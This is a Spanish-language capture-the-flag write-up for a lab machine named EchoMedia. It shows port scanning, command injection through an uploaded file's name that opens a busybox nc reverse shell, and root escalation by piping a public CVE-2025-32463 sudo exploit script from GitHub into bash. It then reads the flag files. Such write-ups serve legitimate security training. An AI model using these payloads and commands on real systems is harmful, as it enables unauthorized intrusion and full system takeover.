Resolución del CTF EchoMedia

Enumeración

Escaneo de puertos

Realizamos un escaneo de todos los puertos para identificar los servicios activos en el sistema objetivo.

nmap -p- --open -sCV -Pn -n --min-rate 5000 192.168.0.110

nmap -p- --open -sCV -Pn -n --min-rate 5000 192.168.0.110

• -p- : Escaneo de todos los puertos. (65535)
• -sS : Realiza un TCP SYN Scan para escanear rápidamente qué puertos están abiertos.
• -sC : Escaneo con scripts básicos de reconocimiento.
• -sV : Detección de servicios.
• –min-rate 5000 : Escaneo no inferior a 5000 paquetes/segundo.
• -n : Sin resolución DNS.
• -Pn : Sin descubrimiento por ping.

Identificamos los servicios HTTP en el puerto 80 y un servicio secundario en el puerto 5555.

Enumeración de servicios

Accedemos al servicio HTTP y detectamos un sistema de subida de archivos multimedia que analiza los ficheros mediante ffprobe.

curl -I http://192.168.0.110/

curl -I http://192.168.0.110/

El propio servicio indica que el análisis del archivo se realiza ejecutando ffprobe sobre el nombre del fichero, lo que introduce un vector claro de inyección de comandos.

Explotación

Inyección de comandos vía nombre de archivo

Construimos un nombre de archivo que cierra el contexto del comando y ejecuta una reverse shell usando busybox nc.

nc -lvnp 8888

nc -lvnp 8888

Subimos un archivo multimedia renombrado con el siguiente payload como nombre:

test.";busybox nc 3232235886 8888 -e sh #

test.";busybox nc 3232235886 8888 -e sh #

Tras el procesamiento del archivo, obtenemos una shell como www-data.

id

id

Mejora de shell

Convertimos la shell en una sesión interactiva para operar con normalidad.

script /dev/null -c bash

script /dev/null -c bash

stty raw -echo; fg

stty raw -echo; fg

reset

reset

Escalada de privilegios

Durante la enumeración local detectamos que la versión de sudo es vulnerable a una elevación de privilegios conocida.

Explotación de CVE-2025-32463

Descargamos y ejecutamos un exploit funcional que abusa de la resolución de NSS para obtener ejecución como root.

curl -s https://raw.githubusercontent.com/pr0v3rbs/CVE-2025-32463_chwoot/main/exploit.sh | bash

curl -s https://raw.githubusercontent.com/pr0v3rbs/CVE-2025-32463_chwoot/main/exploit.sh | bash

Tras la ejecución, obtenemos una shell con privilegios máximos.

id

id

Post-explotación

Con privilegios de root, accedemos a los archivos de interés del sistema.

cat /home/Dr_Simi/user.txt

cat /home/Dr_Simi/user.txt

cat /root/root.txt

cat /root/root.txt

Compromiso completo del sistema.